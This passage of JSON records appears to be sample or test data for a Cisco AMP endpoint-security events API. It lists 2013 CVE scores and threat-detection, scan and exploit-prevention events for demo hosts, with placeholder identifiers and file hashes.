lnId=CVE-2013-1537"},{"cve":"CVE-2013-2440","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-20
13-2440"},{"cve":"CVE-2013-1557","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1557"},{"cve":"CVE-2013-1558","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1558"},{"cve":"CVE-2013-2435","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2435"},{"cve":"CVE-2013-2432","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2432"},{"cve":"CVE-2013-1569","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1569"},{"cve":"CVE-2013-2431","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2431"},{"cve":"CVE-2013-2383","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2383"},{"cve":"CVE-2013-2427","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2427"},{"cve":"CVE-2013-2425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2425"},{"cve":"CVE-2013-2422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2422"},{"cve":"CVE-2013-2414","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2414"},{"cve":"CVE-2013-0809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0809"},{"cve":"CVE-2013-1493","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493"},{"cve":"CVE-2013-1480","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1480"},{"cve":"CVE-2013-0428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0428"},{"cve":"CVE-2013-0437","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0437"},{"cve":"CVE-2013-0441","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0441"},{"cve":"CVE-2013-0442","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0442"},{"cve":"CVE-2013-0445","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail
?vulnId=CVE-2013-0445"},{"cve":"CVE-2013-0450","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0450"},{"cve":"CVE-2013-1476","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1476"},{"cve":"CVE-2013-1478","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1478"},{"cve":"CVE-2013-1479","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1479"},{"cve":"CVE-2013-1484","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1484"},{"cve":"CVE-2013-0426","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0426"},{"cve":"CVE-2013-1486","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1486"},{"cve":"CVE-2013-1487","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1487"},{"cve":"CVE-2013-0425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0425"},{"cve":"CVE-2013-0422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422"},{"cve":"CVE-2013-0446","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0446"},{"cve":"CVE-2013-1475","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1475"},{"cve":"CVE-2013-2460","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2460"},{"cve":"CVE-2013-5838","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5838"},{"cve":"CVE-2013-5777","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5777"},{"cve":"CVE-2013-5810","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5810"},{"cve":"CVE-2013-5832","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5832"},{"cve":"CVE-2013-5806","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5806"},{"cve":"CVE-2013-5805","score":9.3,"url":"https://web.nvd.nist
.gov/view/vuln/detail?vulnId=CVE-2013-5805"},{"cve":"CVE-2013-5850","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5850"},{"cve":"CVE-2013-5844","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5844"},{"cve":"CVE-2013-5846","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5846"},{"cve":"CVE-2013-2462","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2462"},{"cve":"CVE-2013-2436","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2436"},{"cve":"CVE-2013-2426","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2426"},{"cve":"CVE-2013-2421","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2421"},{"cve":"CVE-2013-2445","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2445"},{"cve":"CVE-2013-5852","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5852"},{"cve":"CVE-2013-2448","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2448"},{"cve":"CVE-2013-2394","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2394"},{"cve":"CVE-2013-2429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2429"},{"cve":"CVE-2013-2430","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2430"},{"cve":"CVE-2013-1563","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1563"},{"cve":"CVE-2013-0429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0429"},{"cve":"CVE-2013-0444","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0444"},{"cve":"CVE-2013-0419","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0419"},{"cve":"CVE-2013-0423","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0423"},{"cve":"CVE-2013-5775","score
":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5775"},{"cve":"CVE-2013-5802","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5802"},{"cve":"CVE-2013-2442","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2442"},{"cve":"CVE-2013-2461","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2461"},{"cve":"CVE-2013-0351","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0351"},{"cve":"CVE-2013-2439","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2439"},{"cve":"CVE-2013-0430","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0430"},{"cve":"CVE-2013-3829","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3829"},{"cve":"CVE-2013-5783","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5783"},{"cve":"CVE-2013-5804","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5804"},{"cve":"CVE-2013-5812","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5812"},{"cve":"CVE-2013-2407","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2407"},{"cve":"CVE-2013-0432","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0432"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255807366103000,"timestamp":1610705095,"timestamp_nanoseconds":45000000,"date":"2021-01-15T10:04:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255807366103064","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255777301332000,"timestamp":1610705088,"timestamp_nanoseconds":259000000,"date":"2021-01-15T10:04:48+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255777301331991","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832267006136549000,"timestamp":1610705083,"timestamp_nanoseconds":294000000,"date":"2021-01-15T10:04:43+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla 
Firefox","clean":true,"scanned_files":97,"scanned_processes":0,"scanned_paths":11,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266988956680000,"timestamp":1610705079,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:04:39+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255730056692000,"timestamp":1610705077,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:04:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255730056691734","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255674222117000,"timestamp":1610705064,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:04:24+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255674222116885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055368265531000,"timestamp":1610705053,"timestamp_nanoseconds":870000000,"date":"2021-01-15T10:04:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055368265531411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255622682509000,"timestamp":1610705052,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:04:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255622682509332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055359675597000,"timestamp":1610705051,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:04:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055359675596818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055355380630000,"timestamp":1610705050,"timestamp_nanoseconds":667000000,"date":"2021-01-15T10:04:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055355380629521","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1ds","file_path":"\\\\?\\C:\\WINDOWS\\system32\\config\\systemprofile\\Desktop\\s1ds","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662224","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662223","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":885000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694926","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":760000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:04:06+00:00","event_type_id":1090519104,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe"}}}} 